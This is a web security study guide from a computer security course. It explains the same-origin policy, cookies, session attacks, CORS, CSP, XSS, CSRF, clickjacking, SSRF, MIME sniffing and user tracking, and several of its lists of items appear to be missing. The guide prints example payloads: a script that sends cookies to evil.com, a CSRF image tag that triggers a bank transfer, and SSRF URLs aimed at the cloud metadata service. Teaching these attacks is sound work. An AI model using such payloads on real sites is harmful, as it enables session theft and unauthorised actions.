pk.org: Computer Security/Lecture Notes

Network Protection -- Web Security

Study Guide

Paul Krzyzanowski – 2025-11-24

Web Security Study Guide

Evolution of browser security

Early web browsers were simple document viewers that displayed static HTML. They weren't interesting security targets because all dynamic behavior happened on servers. The browser just rendered what it received.

Modern browsers have become complete application platforms. They execute JavaScript code downloaded from servers, manipulate page content through the Document Object Model, make asynchronous requests back to servers, and access device sensors. This evolution created a much larger attack surface. More features mean more complexity, and more complexity means more opportunities for vulnerabilities.

WebAssembly extends this further by allowing browsers to execute compiled binary code from languages like C, C++, and Rust. While it runs in a sandbox (and has the same restrictions as JavaScript), the compiled nature makes it harder to detect malicious code compared to JavaScript source.

HTTP versus HTTPS

HTTP transmits everything in plaintext. Anyone monitoring network traffic can see the URLs you visit, page contents, form data, and cookies. This is particularly dangerous on public WiFi.

HTTPS encrypts all communication between browser and server using TLS. This protects against three key threats:

However, understand what HTTPS does NOT protect:

HTTPS provides a secure channel, but you must verify you're communicating with the right party.

Same-origin policy

The same-origin policy is the cornerstone of web security. It restricts how content from one origin can interact with content from another origin.

An origin is defined by three components: protocol (http vs https), hostname (including subdomains), and port number. All three must match for origins to be the same. If a port is not specified, the browser assume 80 for http and 443 for https.

Examples using http://www.example.com:80/page.html as the reference:

The same-origin policy restricts:

The same-origin policy allows:

The distinction: you can embed or link to content, but you generally cannot read that content.

Passive content restrictions

The same-origin policy has interesting restrictions on passive content (non-executable content like images and CSS). While JavaScript can embed passive content from other origins, it cannot inspect that content:

These restrictions prevent scripts from stealing embedded content while still allowing the embedding necessary for the web to function.

Frames and isolation

An iFrame embeds one web page within another. Advertisements, social media widgets, and embedded content typically use iFrames. The browser treats each frame as a separate origin and applies the same-origin policy to isolate them. A script in the parent page cannot access the DOM of an iframe from a different origin, and vice versa.

Document Object Model (DOM)

The DOM represents an HTML document as a tree of objects that JavaScript can access and manipulate. This enables modern interactive web pages. The security concern is that if an attacker can inject JavaScript into your page, they can manipulate the DOM to change what users see, steal information, or redirect users. This is the basis of cross-site scripting attacks.

Cookies

Cookies are the primary mechanism for maintaining state in HTTP. The server sends a Set-Cookie header, the browser stores it, and the browser automatically includes it in subsequent requests to the same server.

Cookies are used for three main purposes:

Session management (authentication cookies): These pass identification about a user's login session. When you log in, the server sends a cookie with a session ID. This cookie is sent with every subsequent request so the server can identify you. This is why Amazon and Facebook don't prompt you for login every time you visit. Session management cookies may also pass shopping cart identifiers, even if you're not logged in.

Personalization: These identify user preferences such as font sizes, types of content to present, or language preferences. They may also include data that will be pre-filled into web forms.

Tracking: These monitor user activity across visits. If a browser doesn't send a cookie on a page request, the server creates a new cookie with a unique identifier. The server logs each page visit with that user's identifier. If you later log in or create an account, the server can associate all the tracked data with your specific user account.

Even though we refer to cookies as authentication cookies or tracking cookies, they all use the same mechanism. It's just a matter of how applications use them.

Critical security attributes you need to know:

Important: cookies don't follow the same-origin policy. They're scoped by domain and path, not port, and this is intentional. This creates security issues taht can be exploited in CSRF attacks.

Session management vulnerabilities

After login, servers typically set a session cookie containing a session ID. This ID identifies you in subsequent requests. Several attacks target this mechanism:

Session hijacking is when an attacker obtains your session ID and uses it to impersonate you. This can happen through:

Session fixation is when an attacker sets your session ID to a value they know before you log in. The attack sequence:

  1. Attacker obtains a valid session ID from the target site

  2. Attacker tricks you into using this session ID (through a crafted URL)

  3. You log in using the attacker's session ID

  4. The site authenticates you, but keeps the same session ID

  5. The attacker now has a valid, authenticated session as you

Defense: Always regenerate session IDs after successful login.

Inadequate session expiration means sessions remain valid too long. Stolen session IDs can be used indefinitely if sessions never expire. Sessions should expire after inactivity and have an absolute maximum lifetime.

Cross-Origin Resource Sharing (CORS)

Sometimes web applications legitimately need to make cross-origin requests. For example, a single-page app at app.example.com might need to fetch data from an API at api.example.com.

CORS allows servers to relax the same-origin policy in a controlled way using HTTP headers. The browser sends an Origin header with the request. The server responds with Access-Control-Allow-Origin indicating which origins are permitted. If the origin matches, the browser allows JavaScript to read the response.

Key points:

Content Security Policy (CSP)

CSP helps prevent cross-site scripting and code injection attacks. It's implemented through an HTTP response header that specifies which resources the browser is allowed to load.

Example: Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com

This says resources should only load from the same origin by default, but scripts can additionally load from the specified CDN.

The key concept: CSP provides a whitelist of trusted sources. Even if an attacker injects HTML trying to load a malicious script, the browser blocks it if it doesn't come from an allowed source. This is defense in depth—even if input validation fails and XSS is possible, CSP can prevent the malicious script from executing.

The challenge of input validation

The advice "validate all input" is deceptively simple. The problem is that what constitutes valid input depends entirely on context. The same data might be safe in one context but dangerous in another.

Consider the name O'Brien:

You cannot check if input is "safe" in general. You must validate or encode based on how the data will be used. This is context-dependent at multiple layers. HTML encoding turns < into &lt;, which works for HTML content. But if you're inserting data into a JavaScript string within an HTML page, you need JavaScript encoding, not HTML encoding.

Cross-site scripting (XSS)

XSS is an attack where an attacker injects malicious scripts into web pages viewed by other users. When victims visit the page, the script executes in their browser with full access to the page's DOM, cookies (unless HttpOnly), and session storage.

Stored XSS: The malicious script is permanently stored on the target server (in a database, comment field, forum post). When other users view the page containing the stored data, the script executes.

Example: Attacker posts a comment containing <script>document.location='http://evil.com/steal?cookie='+document.cookie;</script>. When users view the comment, their cookies are sent to the attacker's server.

Reflected XSS: The malicious script is reflected back to the user immediately in the server's response. Typically occurs when user input is included in the response without proper sanitization.

Example: A search page displays "You searched for: [query]" and the query contains <script>alert('XSS')</script>. Attackers trick victims into clicking malicious links through phishing.

DOM-based XSS: The vulnerability exists entirely in client-side JavaScript that processes user input unsafely. The malicious data never goes to the server but is processed directly in the browser.

Example: JavaScript that reads a URL parameter and inserts it directly into the page using innerHTML.

Prevention:

Cross-site request forgery (CSRF)

CSRF tricks a victim's browser into making unwanted requests to a web application where the victim is authenticated. It exploits the fact that browsers automatically include cookies with requests, even when those requests originate from other sites.

Attack scenario: You're logged into your bank at bank.com, which sets a session cookie. You then visit evil.com while still logged in. The malicious site contains:

<img src="https://bank.com/transfer?to=attacker&amount=1000">

Your browser automatically makes a GET request to bank.com/transfer and includes your bank.com cookies. If the bank relies solely on session cookies for authentication, the transfer succeeds.

The attack works because:

  1. The browser automatically includes cookies with requests

  2. The bank cannot distinguish this request from a legitimate one

  3. The same-origin policy doesn't prevent making the request, only reading the response

Prevention strategies:

Clickjacking

Clickjacking tricks users into clicking something different from what they perceive. The attacker embeds the target site in a transparent iframe positioned over a decoy element.

Example: An attacker creates a page saying "Click here to win a free iPad!" but places a transparent iframe containing your bank's "confirm transfer" button precisely where users will click. When victims click for their prize, they're actually clicking the hidden bank button.

Prevention:

JavaScript-based frame-busting approaches are not reliable. HTTP headers are the preferred solution.

Server-side request forgery (SSRF)

SSRF is when an attacker causes a server to make HTTP requests to unintended locations. This can expose internal services, bypass firewall restrictions, or access cloud metadata services.

Example: A web application fetches content from user-provided URLs. An attacker requests http://localhost/admin or http://169.254.169.254/latest/meta-data/ (the cloud metadata service). The server makes requests to these URLs, which might not be accessible from the public internet but are accessible from the server itself. In cloud environments, metadata services can contain sensitive information like API credentials.

Prevention: Whitelist allowed destinations, block private IP ranges and cloud metadata services, use proper URL parsing to validate hostnames, disable or limit redirects, and use network segmentation to isolate web applications from sensitive internal services.

MIME sniffing attack

Passive content (images, videos, stylesheets) is considered to have no authority because it cannot execute scripts or interact with the DOM. However, browsers sometimes perform MIME sniffing, trying to guess the content type based on actual content rather than the declared MIME type.

Attackers exploit this by uploading malicious content disguised as passive content. For example, an attacker uploads a file crafted to look like an image but containing JavaScript code. The file is declared as an image (Content-Type: image/jpeg), and the server accepts it. When a browser requests this file and performs MIME sniffing, it may decide the content looks like HTML or JavaScript and execute it as a script rather than treating it as an image.

This allows the attacker to inject and execute malicious code, bypassing server-side input validation that only checks file extensions or declared content types.

Defense: Web servers should include the X-Content-Type-Options: nosniff header, which instructs browsers not to perform MIME sniffing and to strictly interpret content based on its declared Content-Type.

User tracking

Beyond direct security attacks, web technology enables extensive tracking of user behavior across sites.

Third-party cookies: When you visit shopping.com that includes an image from adnetwork.com, that ad network can set a cookie. Later, when you visit news.com that also includes content from adnetwork.com, your browser sends that cookie. The ad network now knows the same user visited both sites. Over time, this builds a profile of your browsing across all sites using that ad network.

Modern browsers defend against this by blocking third-party cookies by default (Safari, Firefox) or partitioning storage by top-level site so third-party cookies are isolated per site.

Tracking pixels: A tiny, typically transparent image embedded in a page or email. When your browser loads it, the server records information about the visit. If it sets a cookie, it can track you across visits and sites. Used for web analytics, conversion tracking, email tracking (detecting when emails are opened), and retargeting (serving ads for products you previously viewed).

Browser fingerprinting: Identifying browsers based on their unique combination of characteristics, including browser version, operating system, screen resolution, installed fonts, time zone, canvas rendering, WebGL information, and audio processing. These attributes often create a unique fingerprint that can identify a specific browser even without cookies. Harder to defend against because it doesn't rely on storing data in the browser.

Social engineering and user deception

Homograph attacks: Exploiting Unicode characters that look similar to ASCII characters. An attacker registers pаypal.com (with a Cyrillic 'a') which usually looks identical to paypal.com but is a completely different domain. Other confusable characters include Cyrillic 'о' versus Latin 'o', and the number '1' versus lowercase 'L' versus uppercase 'I'. Modern browsers display warnings for mixed-script domains but aren't perfect.

Subdomain tricks and misleading domain names (combosquattting and typosquatting): Creating domains like paypal.com.evil-site.com or login-paypal.com-secure.phishing.com. Users who don't carefully read the full domain from right to left might be deceived. The actual domain is what comes before the final top-level domain.

Visual spoofing: Websites display fake certification logos, copy legitimate brand designs, create fake browser warnings, or make fake close buttons that actually link to malicious content. Users should verify security claims through independent channels.

Status bar spoofing: JavaScript can change a link's destination after the status bar displays a benign URL. When you hover, you see the legitimate URL, but clicking takes you elsewhere. Typing URLs directly or using bookmarks is safer for critical sites.

https security: HTTPS only means the connection is encrypted, not that the site is trustworthy. An attacker can get valid certificates for their own malicious domains. Users may mistake a secure connection for a trustworthy one.


Terms you should know